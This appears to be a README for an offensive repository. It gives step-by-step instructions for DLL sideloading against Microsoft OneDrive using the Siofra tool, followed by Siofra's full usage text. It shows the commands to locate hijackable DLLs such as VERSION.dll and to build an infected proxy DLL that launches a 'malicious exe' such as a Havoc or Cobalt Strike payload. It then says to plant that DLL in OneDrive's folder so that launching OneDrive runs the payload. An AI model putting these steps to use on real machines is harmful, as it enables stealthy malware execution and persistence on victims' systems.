Dll sideloading using Exe or Dll What We Need ?
-
A malicious exe ( Like generated by Havoc, Cobalt-Strike or using a Dropper) Or a Dll
-
A legit dll
-
A vulnerable location according to dll to place the malicious one there ( We Can Find It Using The Same Tool).
-
USAGE:
-
Clone the repo or download zip.
-
First we have to find vulnerable location and binaries.
-
For OneDrive the location of OneDrive.exe is ( C:\Users\mulware\AppData\Local\Microsoft\OneDrive\OneDrive.exe )
-
Open Cmd go to the Siofra location
-
Use Command : Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f C:\Users\mulware\AppData\Local\Microsoft\OneDrive\OneDrive.exe
-
You will get the vulnerable location ( Example :
-
[!] Module Secur32.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\Secur32.dll (real path: C:\WINDOWS\system32\Secur32.dll)
-
[!] Module VERSION.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\VERSION.dll (real path: C:\WINDOWS\system32\VERSION.dll)
-
[!] Module WININET.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\WININET.dll (real path: C:\WINDOWS\system32\WININET.dll)
-
[!] Module WTSAPI32.dll vulnerable at C:\Users\mulware\AppData\Local\Microsoft\OneDrive\WTSAPI32.dll (real path: C:\WINDOWS\system32\WTSAPI32.dll) )
-
Make a folder ( For example named : dll-sideloading )
-
Now copy the dll you want to proxy using the real path to the folder (for example copy version.dll ( C:\WINDOWS\system32\VERSION.dll ) to the folder)
-
Also place the malicious dll or exe in the folder
-
Make a Sub-folder named output
-
open cmd go to the siofra location
-
Use Command : Siofra64.exe --mode infect -f C:\Users\mulware\Desktop\DLL-sideloading\version.dll -o C:\Users\mulware\Desktop\DLL-sideloading\output\version.dll --payload-path C:\Users\mulware\Desktop\DLL-sideloading\malware.exe --payload-type process
-
The Payload type = For exe ( process ) and for dll ( library )
-
If successful you will get a malicious dll in output file
-
Copy the malicious dll in the vulnerable location we find above ( For Example : C:\Users\mulware\AppData\Local\Microsoft\OneDrive\VERSION.dll )
-
Now Run OneDrive.exe
-
BOOM !
:::::::::OPTIONAL :::::::::
More Usage :
- *] Siofra version 1.13 usage: Siofra64.exe --mode [Supported modes: "file-scan", "mem-scan" and "infect"] -v [Optional. Output verbosity level]
- Verbosity levels:
-
0 - No output - 1 - Only critical success/failure status (default)
- 2 - Additional status details for success/failure status, including discarded PEs - 3 - Everything
- File scan mode:
- -f [File or directory to scan] - -r [Optional. Recursive scan] - --signed [Optional. Process only signed binaries] - --delayload [Optional. Include delayload imports in dependency list] - --explicit-loadlibrary [Optional. Include potentially explicit imports in dependency list (these are *.dll strings which may have been called via LoadLibrary(Ex)A/W] - --auto-elevate [Optional. Scan only auto-elevate binaries]
- Memory scan mode:
- --pid [Target process ID to scan. When not specified, a list of either 32 or 64-bit process names/PIDs will be enumerated (corresponding to either the 32 or 64-bit version of this tool)]
- Any scan mode:
- --enum-dependency [Enumerate dependencies]
- --show-unmapped-apiset [Optional. Include API sets which failed to map to a module from output (ignored by default)]
- --dll-hijack [Enumerate DLL hijacking vulns]
- --find-module [Optional. Scan dependencies for a specific module. Note that this excludes KnownDLLs]
- Infect mode:
- -f [DLL file to infect]
- -o [Output file]
- --payload-path [Path of DLL to be loaded in to infected DLL at runtime, or path of executable to be launched at runtime]
- --payload-type [The type of payload specified in the parasite payload path. This can be "process" (generally indicating a exe) or "library" (generally indicating a DLL)]
CREDITS : https://github.com/cys3c